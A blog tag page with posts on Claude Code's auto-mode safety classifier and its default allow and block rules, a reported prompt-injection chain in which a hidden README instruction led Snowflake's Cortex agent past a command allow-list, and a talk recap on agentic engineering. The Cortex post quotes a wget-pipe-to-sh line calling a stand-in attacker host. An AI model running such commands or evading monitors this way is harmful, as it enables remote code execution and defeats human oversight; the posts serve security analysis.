Simon Willison's Weblog: prompt-injection

Auto mode for Claude Code

2026-03-24T23:57:33+00:00

Really interesting new development in Claude Code today as an alternative to --dangerously-skip-permissions:

Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.

Those safeguards appear to be implemented using Claude Sonnet 4.6, as described in the documentation:

Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]

Model: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model.

They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal:

claude auto-mode defaults

Here's the full JSON output. It's pretty long, so here's an illustrative subset:

From the "allow" list:

Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases

Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using --ignore-certificate-errors for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK.

Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it.

Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (pip install -r requirements.txt, npm install, cargo build, bundle install) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. pip install foo, npm install bar) — those carry typosquat and supply-chain risk. [...]

From "soft_deny":

Git Destructive: Force pushing (git push --force), deleting remote branches, or rewriting remote history

Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead. -Code from External: Downloading and executing code from external sources — e.g. curl | bash, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted.

Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...]

I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through:

The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk.

The fact that the default allow list includes pip install -r requirements.txt also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning with LiteLLM.

I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode.

Tags: security, ai, prompt-injection, generative-ai, llms, coding-agents, claude-code

Snowflake Cortex AI Escapes Sandbox and Executes Malware

2026-03-18T17:43:49+00:00

Snowflake Cortex AI Escapes Sandbox and Executes Malware

PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed.

The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.

The attack caused the agent to execute this code:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.

I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.

I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.

Via Hacker News

Tags: sandboxing, security, ai, prompt-injection, generative-ai, llms

My fireside chat about agentic engineering at the Pragmatic Summit

2026-03-14T18:19:38+00:00

I was a speaker last month at the Pragmatic Summit in San Francisco, where I participated in a fireside chat session about Agentic Engineering hosted by Eric Lui from Statsig.

The video is available on YouTube. Here are my highlights from the conversation.

Stages of AI adoption

We started by talking about the different phases a software developer goes through in adopting AI coding tools.

02:45

I feel like there are different stages of AI adoption as a programmer. You start off with you've got ChatGPT and you ask it questions and occasionally it helps you out. And then the big step is when you move to the coding agents that are writing code for you—initially writing bits of code and then there's that moment where the agent writes more code than you do, which is a big moment. And that for me happened only about maybe six months ago.

03:42

The new thing as of what, three weeks ago, is you don't read the code. If anyone saw StrongDM—they had a big thing come out last week where they talked about their software factory and their two principles were nobody writes any code, nobody reads any code, which is clear insanity. That is wildly irresponsible. They're a security company building security software, which is why it's worth paying close attention—like how could this possibly be working?

I talked about StrongDM more in How StrongDM's AI team build serious software without even looking at the code.

Trusting AI output

We discussed the challenge of knowing when to trust the AI's output as opposed to reviewing every line with a fine tooth-comb.